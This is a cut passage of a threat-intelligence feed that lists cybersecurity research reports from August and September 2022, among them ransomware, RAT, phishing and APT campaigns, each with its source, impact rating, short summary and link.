Summary:: Researchers from Avast Threat Lab have identified a Pro-Russian Group named NoName057(16) that is performing DDoS attacks on websites belonging to governments, news agencies, armies, suppliers, telecommunications companies, transportation authorities, financial institutions, and more in Ukraine and neighboring countries supporting Ukraine, like Ukraine itself, Estonia, Lithuania, Norway, and Poland

Source: https://decoded.avast.io/martinchlumecky/bobik/?utm_source=rss&utm_medium=rss&utm_campaign=bobik

Intel Source:: Checkpoint

Intel Name:: DangerousSavanna_Malicious_Campaign_Targeting_Financial_Institutions

Date of Scan:: 2022-09-06

Impact:: LOW

Summary:: Researchers from Checkpoint have analysied a malicious campaign called DangerousSavanna which has been targeting multiple major financial service groups in French-speaking Africa for the last two years.

Source: https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/

Intel Source:: TrendMicro

Intel Name:: Play_Ransomware_Following_the_Tactics_of_Hive_and_Nokoyawa_Ransomware

Date of Scan:: 2022-09-06

Impact:: LOW

Summary:: Trendmicro researchers have investigated Play ransomware and found It uses many tactics that follow the playbook of both Hive and Nokoyawa ransomware, including similarities in the file names and file paths of their respective tools and payloads.

Source: https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html

Intel Source:: AT&T

Intel Name:: Shikitega_Malware_Targeting_Linux

Date of Scan:: 2022-09-06

Impact:: MEDIUM

Summary:: Researchers from AT&T Alien Labs have discovered a new malware named Shikitega targeting endpoints and IoT devices that are running Linux operating systems.

Source: https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux

Intel Source:: ASEC

Intel Name:: HWP_File_Exploit_OLE_Objects_and_Flash_Vulnerabilities

Date of Scan:: 2022-09-05

Impact:: LOW

Summary:: Researchers from ASEC have identified a malicious HWP file that exploits OLE objects and flash vulnerabilities. The identified HWP file includes OLE objects, and the corresponding files are generated in the %TEMP% folder when the HWP file is opened.

Source: https://asec.ahnlab.com/en/38479/

Intel Source:: SafeBreach

Intel Name:: A_New_CodeRAT_is_Being_Exposed

Date of Scan:: 2022-09-05

Impact:: LOW

Summary:: SafeBreach Labs researchers have discovered a new targeted attack and uncovered New Remote Access Trojan. It is targeting Farsi-speaking code developers using a Microsoft Dynamic Data Exchange (DDE) exploit.

Source: https://www.safebreach.com/resources/blog/remote-access-trojan-coderat/

Intel Source:: TrendMicro

Intel Name:: BumbleBee_is_Refactored_Version_of_Bookworm_Backdoor

Date of Scan:: 2022-09-05

Impact:: LOW

Summary:: Researchers from Trendmicro analyzed a backdoor with a unique modular architecture and named it BumbleBee due to a string embedded in it. The features of BumbleBee and Bookworm are similar, so BumbleBee is likely to be a refactored version of the latter and target Asian local governments.

Source: https://www.trendmicro.com/en_us/research/22/i/buzzing-in-the-background-bumblebee-a-new-modular-backdoor-evolv.html

Intel Source:: Resecurity

Intel Name:: EvilProxy_PhaaS_with_MFA_Bypass_Rising_in_DarkWeb

Date of Scan:: 2022-09-05

Impact:: LOW

Summary:: Researchers from Resecurity have identified a new Phishing-as-a-Service (PhaaS) called EvilProxy advertised in the Dark Web. The threat actors are using Reverse Proxy and Cookie Injection methods to bypass 2FA authentication.

Source: https://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web

Intel Source:: IBM Security Intelligence

Intel Name:: The_Evidence_of_Connection_between_Raspberry_Robin_malware_and_Dridex

Date of Scan:: 2022-09-02

Impact:: LOW

Summary:: Researchers from IBM have identified functional similarities between a malicious component used in the Raspberry Robin infection chain and a Dridex malware loader, further strengthening the operators' connections to the Russia-based Evil Corp group.

Source: https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/

Intel Source:: Uptycs

Intel Name:: ELF_Based_Ransomware_targating_Linux_system

Date of Scan:: 2022-09-02

Impact:: LOW

Summary:: Researchers from Uptycs have observed an Executable and Linkable Format (ELF) ransomware which encrypts the files inside Linux systems based on the given folder path and they dropped a README note.

Source: https://www.uptycs.com/blog/another-ransomware-for-linux-likely-in-development

Intel Source:: BitDefender

Intel Name:: Snake_Keylogger_Returns_with_New_Malspam_Campaign

Date of Scan:: 2022-09-02

Impact:: LOW

Summary:: According to BitDefender researchers, the IP addresses used in the attack originated from Vietnam, while the campaign's main targets were based in the USA. To lure victims into opening ZIP archives, attackers use the profile of one of Qatar's largest IT and cloud service providers. It contains an executable called CPMPANY PROFILE.exe.

Source: https://www.bitdefender.com/blog/hotforsecurity/snake-keylogger-returns-in-malspam-campaign-disguised-as-business-portfolio-from-it-vendor/

Intel Source:: CSIRT

Intel Name:: Ransomware_targating_Microsoft_and_VMware_ESXiservers

Date of Scan:: 2022-09-02

Impact:: LOW

Summary:: CSIRT have reported an incident that affected a government service. The incident corresponds to ransomware that affected Microsoft and VMware ESXi servers in the corporate networks of the institution.

Source: https://www.csirt.gob.cl/noticias/alerta-de-seguridad-cibernetica-incidente-en-servicio-publico/

Intel Source:: Cloudsek

Intel Name:: A_Detailed_Analysis_of_Redeemer_Ransomware

Date of Scan:: 2022-09-02

Impact:: LOW

Summary:: Researchers from CloudSEK have deeply analyzed Redeemer Ransomware. It was initially identified in June 2021, and since then, four public versions (1.0, 1.5, 1.7, and 2.0) have been released.

Source: https://cloudsek.com/what-is-redeemer-ransomware-and-how-does-it-spread-a-technical-analysis/?utm_source=rss&utm_medium=rss&utm_campaign=what-is-redeemer-ransomware-and-how-does-it-spread-a-technical-analysis

Intel Source:: Zscaler

Intel Name:: Prynt_Stealer_Malware_Secret_Backdoor_Exposed

Date of Scan:: 2022-09-02

Impact:: LOW

Summary:: Researchers from Zscaler have uncovered the Prynt Stealer builder, attributed with WorldWind, and DarkEye has a secret backdoor in the code that ends up in every derivative copy and variant of these malware families.

Source: https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed

Intel Source:: Redacted

Intel Name:: Diving_Deep_into_BianLian_Ransomware

Date of Scan:: 2022-09-02

Impact:: MEDIUM

Summary:: Researchers from Redacted have observed the BianLian threat actor tripling their known command and control (C2) infrastructure in the month of August, suggesting a possible increase in the actor’s operational tempo.

Source: https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/?utm_source=PR&utm_campaign=BianLian&utm_content=media

Intel Source:: CERT-UA

Intel Name:: The_AgentTesla_malware_increased_distribution

Date of Scan:: 2022-09-01

Impact:: LOW

Summary:: CERT-UA has tracked mass mailings of emails with the topic "Technisches Zeichnen" and attached to the e-mail is an IMG file containing a CHM file of the same name, opening which will execute JavaScript code.

Source: https://cert.gov.ua/article/1563322

Intel Source:: Cyble

Intel Name:: MagecartJavaScriptSkimmerStealingPaymentInformation

Date of Scan:: 2022-09-01

Impact:: LOW

Summary:: Researchers from Cyble Intelligence Labs have identified that JavaScript skimmer created by the Magecart threat group has been stealing payment information from the Magento e-commerce website.

Source: https://blog.cyble.com/2022/09/01/highly-evasive-magecart-javascript-skimmer-active-in-the-wild/

Intel Source:: Cisco Talos

Intel Name:: Hackers_Using_ModernLoader_RAT_to_Infect_Systems_with_Stealers_and_Cryptominers

Date of Scan:: 2022-09-01

Impact:: MEDIUM

Summary:: Researchers at Cisco Talos have observed three distinct campaigns between March and June 2022 that delivered a number of threats, including the ModernLoader bot, the RedLine information stealer, and cryptocurrency mining malware.

Source: https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

Intel Source:: ASEC

Intel Name:: Hackers_Leveraging_Fast_Reverse_Proxy_tool_to_Attack_Korean_Companies

Date of Scan:: 2022-09-01

Impact:: LOW

Summary:: ASEC researchers have identified hackers scanning and attacking externally accessible corporate PCs such as IIS web servers or MS Exchange servers. Afterward, they use Webshell to access a part of the system and abuse Potato or Exploit tools that support privilege escalation, thereby obtaining system privileges.

Source: https://asec.ahnlab.com/en/38156/

Intel Source:: Cyber Geeks

Intel Name:: A_new_wild_version_of_ChromeLoader

Date of Scan:: 2022-09-01

Impact:: LOW

Summary:: Cybergeeks analyzed a new version of ChromeLoader (also known as Choziosi Loader)last couple weeks weeks and it appears that this campaign that has become widespread and has spawned multiple versions, making atomic indicators ineffective for detections.

Source: https://cybergeeks.tech/chromeloader-browser-hijacker/

Intel Source:: ASEC

Intel Name:: Malicious_MS_Word_Files_Targeting_North_Korea

Date of Scan:: 2022-09-01

Impact:: LOW

Summary:: Researchers from ASEC have discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea.

Source: https://asec.ahnlab.com/en/38182/

Intel Source:: CERT-UA

Intel Name:: The_cash_payments_online_fraud

Date of Scan:: 2022-09-01

Impact:: LOW

Summary:: CERT-UA observed an increase in the number of scam pages in the Facebook social network. The content of these pages refers to the topic of monetary compensation, the eHelp platform, financial assistance from various organizations and partners.

Source: https://cert.gov.ua/article/1545776

Intel Source:: ASEC

Intel Name:: VBScript_downloads_a_malicious_HWP_file

Date of Scan:: 2022-09-01

Impact:: LOW

Summary:: Researchers from ASEC team have discovered a VBScript that downloads a malicious HWP file and the distribution path of malware is yet to be determined, but the VBScript is downloaded through curl.

Source: https://asec.ahnlab.com/en/38203/

Intel Source:: ASEC

Intel Name:: RAT_Tool_Distributed_on_Github_as_Solution_File

Date of Scan:: 2022-09-01

Impact:: LOW

Summary:: ASEC researchers have discovered a RAT Tool disguised as a solution file (*.sln) on GitHub. To avoid detection, the malware disguised itself as a solution file. Upon execution, it injects into normal Windows programs, such as AppLaunch.exe, RegAsm.exe, and InstallUtil.exe, to run a RAT.

Source: https://asec.ahnlab.com/en/38150/

Intel Source:: Cybereason

Intel Name:: Ragnar_Locker_Ransomware_Targeting_Energy_Sector

Date of Scan:: 2022-09-01

Impact:: LOW

Summary:: Researchers from Cybereason have investigated the Ragnar Locker malware family, a ransomware and a ransomware operator which has recently claimed to have breached DESFA, a Greek pipeline company.

Source: https://www.cybereason.com/blog/threat-analysis-report-ragnar-locker-ransomware-targeting-the-energy-sector

Intel Source:: BitDefender

Intel Name:: Diving_Deep_into_Industrial_Espionage_Operation

Date of Scan:: 2022-09-01

Impact:: LOW

Summary:: BitDefender researchers have analyzed corporate espionage in depth. As it is one of the common misconceptions that espionage is affecting only large corporations or government entities, but it is more common than expected.

Source: https://businessinsights.bitdefender.com/deep-dive-into-a-corporate-espionage-operation

Intel Source:: Netlab 360

Intel Name:: The_activation_of_PureCrypter_Loader_continues

Date of Scan:: 2022-08-31

Impact:: MEDIUM

Summary:: Researchers from Netlab have identified that PureCrypter Loader is continued to be active this year, and spread over 10 other families including Formbook, SnakeKeylogger, AgentTesla, Redline, AsyncRAT, and more.

Source: https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/

Intel Source:: Netskope

Intel Name:: AsyncRAT_Leveraging_Fully_Undetected_Downloader

Date of Scan:: 2022-08-30

Impact:: LOW

Summary:: Researchers from Netskope have analysied the complete infection flow of AsyncRAT, from the FUD BAT downloader spotted by the MalwareHunterTeam to the last payload. Although no AV vendor is detecting the file, it contains many detections via Sigma and IDS rules, as well as by sandboxes used by VirusTotal.

Source: https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader

Intel Source:: Securonix

Intel Name:: New_Golang_Attack_Campaign_GO#WEBBFUSCATOR_Leverages_Office_Macros

Date of Scan:: 2022-08-30

Impact:: MEDIUM

Summary:: Securonix Threat Labs Threat Research Team has analysed recently a unique sample of a persistent Golang-based attack campaign tracked by Securonix as GO#WEBBFUSCATOR who infects the target system with the malware.

Source: https://www.securonix.com/blog/golang-attack-campaign-gowebbfuscator-leverages-office-macros-and-james-webb-images-to-infect-systems/

Intel Source:: ProofPoint

Intel Name:: TA423_threat_group_targeting_countries_in_South_China_Sea

Date of Scan:: 2022-08-30

Impact:: MEDIUM

Summary:: Researchers from Proofpoint and Pwc threat intelligence team have identified a phishing campaign, running for over a year and currently ongoing, and targeting countries in the South China Sea, as well as further intrusions in Australia, Europe, and the United States.

Source: https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea

Intel Source:: AT&T

Intel Name:: Crypto_miners_updated_with_latest_techniques

Date of Scan:: 2022-08-30

Impact:: LOW

Summary:: Researchers from AT&T Alien Labs have provided an overview of an ongoing crypto mining campaign that caught our eye due to the big number of loaders that have shown up during the month of June, as well as how staged the execution is for a simple malware like a miner.

Source: https://cybersecurity.att.com/blogs/labs-research/crypto-miners-latest-techniques

Intel Source:: Cyble

Intel Name:: Mini_Stealer_Builder_and_Panel_For_Free

Date of Scan:: 2022-08-30

Impact:: LOW

Summary:: Cyble Research and Intelligence Labs have discovered a post on a cybercrime forum where a Threat Actor released MiniStealer’s builder and panel for free, and they claim that the stealer can target operating systems such as Windows 7, 10, and 11.

Source: https://blog.cyble.com/2022/08/29/mini-stealer-possible-predecessor-of-parrot-stealer/

Intel Source:: SocInvestigations

Intel Name:: Remcos_RAT_updated_with_New_TTPs

Date of Scan:: 2022-08-29

Impact:: LOW

Summary:: Researchers from SOCInvestigation have identified new TTPs of Remcos RAT. It is a dangerous trojan available to attackers for a relatively low price and it comes equipped with enough robust features to allow attackers to set up their own effective botnets.

Source: https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/

Intel Source:: Cloudsek

Intel Name:: TeamTNT_Group_Targeting_Cloud_Instances_and_Containerized_Environments

Date of Scan:: 2022-08-29

Impact:: LOW

Summary:: CloudSEK researchers have identified the known threat actor TeamTNT has been targeting cloud instances and containerized environments on systems around the world for at least two years.

Source: https://cloudsek.com/threatintelligence/timeline-ttps-of-teamtnt-cybercrime-group/

Intel Source:: Mitiga

Intel Name:: Spear-phishing_and_AiTM_Used_to_Hack_MS_Office_365_Accounts

Date of Scan:: 2022-08-29

Impact:: LOW

Summary:: Mitiga Research Team have identified a sophisticated, advanced business email compromise (BEC) campaign, directly targeting relevant executives of organizations using Office 365.

Source: https://www.mitiga.io/blog/advanced-bec-scam-campaign-targeting-executives-on-o365

Intel Source:: Checkpoint

Intel Name:: A_Crypto_Miner_Malware_Campaign_Named_Nitrokod

Date of Scan:: 2022-08-29

Impact:: LOW

Summary:: Researchers from Checkpoint have detected a cryptomining campaign, called Nitrokod, which potentially infected thousands of machines worldwide. It is created by a Turkish speaking entity and the campaign dropped malware from free software available on popular websites such as Softpedia and uptodown.

Source: https://research.checkpoint.com/2022/check-point-research-detects-crypto-miner-malware-disguised-as-google-translate-desktop-and-other-legitimate-applications/

Intel Source:: CheckMarx

Intel Name:: First_Known_Phishing_Attack_Against_PyPI_Users

Date of Scan:: 2022-08-29

Impact:: LOW

Summary:: Researchers from CheckMarx have identified an ongoing phishing campaign that aims to steal developer credentials and inject malicious updates to the packages in the repository, and It is the first known phishing attack against Python Package Index, PyPI.

Source: https://medium.com/checkmarx-security/first-known-phishing-attack-against-pypi-contributor-95db34548868

Intel Source:: Sentilone

Intel Name:: The_emerging_of_BlueSky_ransomware

Date of Scan:: 2022-08-29

Impact:: LOW

Summary:: The researchers paid close attention again to BlueSky late June 2022. SentinelOne observed this ransomware has being spread via trojanized downloads from questionable websites as well as in phishing emails.

Source: https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/

Intel Source:: ISC.SANS

Intel Name:: A_deployment_of_32-bits_or_64-bits_malware

Date of Scan:: 2022-08-26

Impact:: LOW

Summary:: The reseracher did some experiment by dowloading some samples from MalwareBazaar and got a report of some interesting stats based on YARA rules.

Source: https://isc.sans.edu/diary/32+or+64+bits+Malware%3F/28968

Intel Source:: TrendMicro

Intel Name:: New_Agenda_Ransomware_Customized_for_Each_Victim

Date of Scan:: 2022-08-26

Impact:: LOW

Summary:: Researchers from TrendMicro have discovered a new ransomware that is written in the Go programming language and targeting healthcare and education enterprises in Asia and Africa. This ransomware is called Agenda and is customized per victim.

Source: https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html

Intel Source:: Microsoft

Intel Name:: Iran_Based_Threat_Actor_MERCURY_Leveraging_Exploitation_of_Log4j_2_Vulnerabilities

Date of Scan:: 2022-08-26

Impact:: MEDIUM

Summary:: Microsoft Threat Intelligence and 365 Defender Research team have detected Iran-based threat actor MERCURY leveraging exploitation of Log4j 2 vulnerabilities in SysAid applications against organizations all located in Israel.

Source: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/

Intel Source:: Cyble

Intel Name:: A_Dot_Net_Based_Moisha_Ransomware

Date of Scan:: 2022-08-26

Impact:: LOW

Summary:: Researchers from Cyble have come across a Twitter post about a new ransomware variant named Moisha. A .Net-based ransomware, Moisha was first identified in mid-August 2022, and the name of the TA is PT_MOISHA team.

Source: https://blog.cyble.com/2022/08/25/moisha-ransomware-in-action/

Intel Source:: Labs K7 Security

Intel Name:: BleachGap_ransomware_reappeared

Date of Scan:: 2022-08-26

Impact:: LOW

Summary:: Researchers from Labs K7 Security have analyzed the BleachGap ransomware and found that threat actors are modifying the attack techniques of this malware for a possible major attack that might be planned in the future.

Source: https://labs.k7computing.com/index.php/bleachgap-revamped/

Intel Source:: HC3

Intel Name:: A_Deep_Analysis_of_Karakurt_Ransomware

Date of Scan:: 2022-08-26

Impact:: LOW

Summary:: Researchers from HC3 have analyzed Karakurt Threat Profile deeply and identified four attacks affecting the US Healthcare and Public Health Sector since June 2022. The observed attacks have affected an assisted living facility, a dental firm, a healthcare provider, and a hospital.

Source: https://www.hhs.gov/sites/default/files/karakurt-threat-profile-analyst-note.pdf

Intel Source:: Securelist

Intel Name:: Kimsukys_hackers_using_C2_operations_with_GoldDragon_malware

Date of Scan:: 2022-08-25

Impact:: LOW

Summary:: Researchers from Securelist have identified the Kimsuky threat group continuously evolves its malware infection schemes and adopts novel techniques to hinder analysis. It is one of the most prolific and active threat actors on the Korean Peninsula, operates several clusters and GoldDragon malware is one of the most frequently used.

Source: https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/

Intel Source:: TrendMicro

Intel Name:: Ransomware_Actors_Leveraging_Genshin_Impact_Driver

Date of Scan:: 2022-08-25

Impact:: MEDIUM

Summary:: TrendMicro researchers investigated the mhyprot2.sys and found a vulnerability of an anti-cheat driver for the popular role-playing game Genshin Impact. The driver is currently being abused by a ransomware actor to kill antivirus processes and services for mass-deploying ransomware.

Source: https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html

Intel Source:: Cofense

Intel Name:: Threat_Actors_Leveraging_Compromised_Microsoft_Dynamics_365_Voice_Account_for_Phishing_Attack

Date of Scan:: 2022-08-25

Impact:: LOW

Summary:: Researchers from Cofense have identified a widespread campaign where threat actors use a compromised Dynamics 365 Customer Voice business account and a link posing as a survey to steal Microsoft 365 credentials.

Source: https://cofense.com/blog/compromised-microsoft-dynamic-365-customer-voice-account-used-for-phishing-attack

Intel Source:: Group-IB

Intel Name:: A_0ktapus_Phishing_Campaign

Date of Scan:: 2022-08-25

Impact:: LOW

Summary:: Researchers from Group-IB Threat Intelligence Team have detected 169 unique domains involved in the 0ktapus phishing campaign. While analyzing the phishing sites, they found an image that is legitimately used by sites leveraging Okta authentication, being used by the phishing kit.

Source: https://blog.group-ib.com/0ktapus

Intel Source:: Trellix

Intel Name:: Diving_Deep_into_Qbot_Malware

Date of Scan:: 2022-08-25

Impact:: LOW

Summary:: Researchers from the Trellix SecOps team have observed an uptick in the Qbot malware infections in recent months. It is an active threat for over 14 years and continues to evolve, adopting new infection vectors to evade detection mechanisms.

Source: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html

Intel Source:: Crowdstrike

Intel Name:: The_Deep_examination_of_Wiper_Malware

Date of Scan:: 2022-08-25

Impact:: LOW

Summary:: Researchers from CrowdStrikes Research Team have identified how threat actors use legitimate third-party drivers to bypass the visibility and detection capabilities of security mechanisms and solutions.

Source: https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-2/

Intel Source:: IronNet

Intel Name:: Multiple_Known_Malware_Findings_from_the_BlackHat_NOC

Date of Scan:: 2022-08-25

Impact:: LOW

Summary:: IroNet Hunters uncovered several active malware infections on the Black Hat network, including Shlayer malware, North Korean-attributed SHARPEXT malware, and NetSupport RAT malware.

Source: https://www.ironnet.com/blog/a-view-from-the-black-hat-noc-key-findings

Intel Source:: Avast

Intel Name:: AgentTesla_is_Back_With_a_New_Campaign

Date of Scan:: 2022-08-25

Impact:: LOW

Summary:: Threat researchers from Avast have identified a new malicious campaign and it is threatening businesses around the world. The campaign is targeting users in Spain, Portugal, Romania, and multiple countries in South America.

Source: https://decoded.avast.io/pavelnovak/agenttesla-is-threatening-businesses-around-the-world-with-a-new-campaign/?utm_source=rss&utm_medium=rss&utm_campaign=agenttesla-is-threatening-businesses-around-the-world-with-a-new-campaign

Intel Source:: Zscaler

Intel Name:: Pirated_Software_Download_Sites_Delivering_InfoStealer_Malware

Date of Scan:: 2022-08-24

Impact:: LOW

Summary:: Researchers from Zscaler Threat Labs have discovered multiple ongoing threat campaigns distributing info-stealer malware by targeting victims trying to download pirated software applications.

Source: https://www.zscaler.com/blogs/security-research/making-victims-pay-infostealer-malwares-mimick-pirated-software-download

Intel Source:: CISA

Intel Name:: The_active_exploitation_of_multiple_vulnerabilities_and_Exposures_against_Zimbra_Collaboration_Suite

Date of Scan:: 2022-08-24

Impact:: LOW

Summary:: CISA and MS-ISAC researchers have identified cyber threat actors targeting unpatched Zimbra Collaboration Suite instances in both government and private sector networks.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-228a

Intel Source:: ASEC

Intel Name:: BitRAT_and_XMRig_CoinMiner_Leveraging_Windows_License_Verification_Tool

Date of Scan:: 2022-08-24

Impact:: LOW

Summary:: Researchers from ASEC have discovered the distribution of BitRAT and XMRig CoinMiner disguised as a Windows license verification tool.

Source: https://asec.ahnlab.com/en/37939/

Intel Source:: ASEC

Intel Name:: AsyncRAT_Being_Distributed_in_Fileless_Form

Date of Scan:: 2022-08-24

Impact:: LOW

Summary:: Researchers from ASEC have discovered malicious AsyncRAT codes that are being distributed in fileless form. It is executed in fileless form through multiple script files and is thought to be distributed as a compressed file attachment in emails.

Source: https://asec.ahnlab.com/en/37954/

Intel Source:: Zscaler

Intel Name:: PiratedSoftwareDownloadSitesDeliveringInfoStealerMalware

Date of Scan:: 2022-08-24

Impact:: LOW

Summary:: Researchers from Zscaler Threat Labs have discovered multiple ongoing threat campaigns distributing info-stealer malware by targeting victims trying to download pirated software applications.

Source: https://www.zscaler.com/blogs/security-research/making-victims-pay-infostealer-malwares-mimick-pirated-software-download

Intel Source:: MalwareBytes

Intel Name:: MalspamusedbyattackerstodeliverAgentTeslaRAT

Date of Scan:: 2022-08-23

Impact:: LOW

Summary:: Malwarebytes Threat Intelligence researchers have identified spam emails containing images and CHM files. Upon clicking, It's calling PowerShell commands and started executing AgentTesla through RegAsm.exe.

Source: https://twitter.com/MBThreatIntel/status/1561736526819639298

Intel Source:: SentinelOne

Intel Name:: XCSSET_Malware_updated_with_latest_version

Date of Scan:: 2022-08-23

Impact:: LOW

Summary:: Researchers from SentinelOne have reviewed the changes made to the latest versions of XCSSET malware and reveal some of the contexts in which these threat actors operate.

Source: https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/

Intel Source:: Wordsfence

Intel Name:: Trends_in_Ukrainian_Domain_attacks

Date of Scan:: 2022-08-23

Impact:: LOW

Summary:: Researchers from Wordfence have identified 16 attack types that triggered more than 85 different firewall rules across protected websites with Ukrainian top-level domains.

Source: https://www.wordfence.com/blog/2022/08/analyzing-attack-data-and-trends-targeting-ukrainian-domains/

Intel Source:: Cyble

Intel Name:: IBAN_clipper_malware_targeting_Windows_operating_systems

Date of Scan:: 2022-08-23

Impact:: LOW

Summary:: Researchers from Cyble Labs have highlighted an International Bank Account Number (IBAN) Clipper Malware after identifying a Threat Actor on a cybercrime forum offering monthly subscription-based services of clipper malware targeting Windows operating systems.

Source: https://blog.cyble.com/2022/08/22/dissecting-iban-clipper/

Intel Source:: Google blog

Intel Name:: Iranian_hackers_Leveraging_New_Tool_to_Steal_Email_From_Victims

Date of Scan:: 2022-08-23

Impact:: LOW

Summary:: Researchers from Google Threat Analysis Group have observed New Iranian APT data extraction tool called HYPERSCRAPE. It is written in .NET for Windows PCs and is designed to run on the attacker's machine.

Source: https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/

Intel Source:: Fortinet

Intel Name:: A_Detailed_Analysis_of_PivNoxy_and_Chinoxy_malware

Date of Scan:: 2022-08-23

Impact:: MEDIUM

Summary:: Researchers from Fortinet have identified an attack against the telecommunication agency in South Asia that began with a simple email that initially appeared to be a standard malicious spam email message. However, the attached Word document was weaponized using a malicious tool, Royal Road, and is equipped with an exploit for an Equation Editor vulnerability (CVE-2018-0798).

Source: https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis

Intel Source:: Uptycs

Intel Name:: A_malicious_use_of_Tox_protocol_for_coinminers

Date of Scan:: 2022-08-23

Impact:: LOW

Summary:: Researchers from Uptycs have examined malware samples that do not do anything explicitly malicious, but they feel that it might be part of a coinminer campaign. Additionally, they are observing it for the first time where Tox protocol is used to run scripts onto the machine.

Source: https://www.uptycs.com/blog/is-tox-the-new-cc-method-for-coinminers

Intel Source:: ISC.SANS

Intel Name:: Astaroth_Guildma_malware_pushed_by_malspam

Date of Scan:: 2022-08-23

Impact:: LOW

Summary:: Researchers from SANS have observed an Astaroth (Guildma) malware infection generated from a malicious Boleto-themed email pretending to be from Grupo Solução & CIA. Boleto is a payment method used in Brazil, while Grupo Solução & CIA is Brazil-based company.

Source: https://isc.sans.edu/diary/rss/28962

Intel Source:: Zscaler

Intel Name:: Grandoreiro_Banking_Malware_Targeting_Spanish_and_Mexican_Organizations

Date of Scan:: 2022-08-22

Impact:: LOW

Summary:: Researchers from Zscaler ThreatLabs have observed a Grandoreiro banking malware campaign. In this campaign, the threat actors impersonate government officials from the Attorney General's Office of Mexico City and from the Public Ministry in the form of spear-phishing emails in order to lure victims to download and execute 'Grandoreiro,' a prolific banking trojan.

Source: https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals

Intel Source:: Sucuri

Intel Name:: SocGholish_JavaScript_Malware_Back_into_Action

Date of Scan:: 2022-08-22

Impact:: LOW

Summary:: Researchers from Sucuri have analysed the SocGholish JavaScript Malware and they are outlining the injections and URLs used in the website malware portion of the SocGholish attack outside of the NDSW/NDSX campaign.

Source: https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html

Intel Source:: MalwareBytes

Intel Name:: FIN7_rewrite_JSSLoader_malware_with_expanded_capabilities

Date of Scan:: 2022-08-22

Impact:: MEDIUM

Summary:: Researchers at Malwarebytes has identified a malspamcampaign in late June that they attribute to the FIN7 APT group. FIN7 has rewritten JSSLoader malware with expanded capabilities as well as new functions that include data exfiltration.

Source: https://malwarebytes.app.box.com/s/ym6r7o5hq0rx2nxjbctfv2sw5vx386ni

Intel Source:: Sucuri

Intel Name:: A_malicious_JavaScript_injection_affecting_WordPress_websites

Date of Scan:: 2022-08-22

Impact:: LOW

Summary:: A recent spike in JavaScript injections targeting WordPress sites has resulted in fake DDoS prevent prompts which takes victims to download remote access trojan malware was observed and analyzed by Sucuri reserachers

Source: https://blog.sucuri.net/2022/08/fake-ddos-pages-on-wordpress-lead-to-drive-by-downloads.html

Intel Source:: Cyble

Intel Name:: XWorm_RAT_with_Ransomware_and_HNVC_attack_capabilities

Date of Scan:: 2022-08-22

Impact:: LOW

Summary:: Researchers from Cyble labs have discovered a dark web post where a malware developer was advertising a powerful Windows RAT and its redirecting to the website of malware developer, where multiple malicious tools are being sold.

Source: https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/

Intel Source:: Cyble

Intel Name:: New_BianLian_Ransomware_Targeting_Multiple_Industries

Date of Scan:: 2022-08-22

Impact:: MEDIUM

Summary:: Researchers from Cyble have observed that malware written in the programming language “Go” has recently been popular among Threat Actors. Also, during their daily threat hunting exercise, they came across a Twitter post about a ransomware variant written in Go named BianLian.

Source: https://blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise/

Intel Source:: Group-IB

Intel Name:: APT41_targeted13entitiesinU.S,_Taiwan,_India,_Vietnam_and_China

Date of Scan:: 2022-08-21

Impact:: MEDIUM

Summary:: GroupIB has been monitoring APT41 activities since 2021 and generated report which documents about their target across 13 organizations geographically spanning across the U.S, Taiwan, India, Vietnam, and China.

Source: https://blog.group-ib.com/apt41-world-tour-2021

Intel Source:: Group-IB

Intel Name:: ATMZOW_JS_Sniffer_Campaign_Connected_to_Hancitor_Malware

Date of Scan:: 2022-08-21

Impact:: MEDIUM

Summary:: Researchers from Group-IB have identified the connection between ATMZOW JS sniffer campaign and Hancitor malware downloader were both operated by the same threat actor. They have collected information about ATMZOW’s recent activity and found ties with a phishing campaign targeting clients of a US bank based on the same JS obfuscation technique.

Source: https://blog.group-ib.com/switching-side-jobs

Intel Source:: ProofPoint

Intel Name:: TA558_Targets_Hospitality_and_Travel_firms

Date of Scan:: 2022-08-20

Impact:: MEDIUM

Summary:: Researchers at ProofPoint has monitoring activities of threat actor TA558 since 2018, and in 2022 the actor has still targeting hospitality, travel and related industries based in Latin America, North America, and western Europe. Moreover currently TA558 has shifted tactics to URLs and container files to distribute malware.

Source: https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

Intel Source:: Securelist

Intel Name:: Malicious_PyPi_packages_turn_Discord_into_info_stealing_malware

Date of Scan:: 2022-08-19

Impact:: LOW

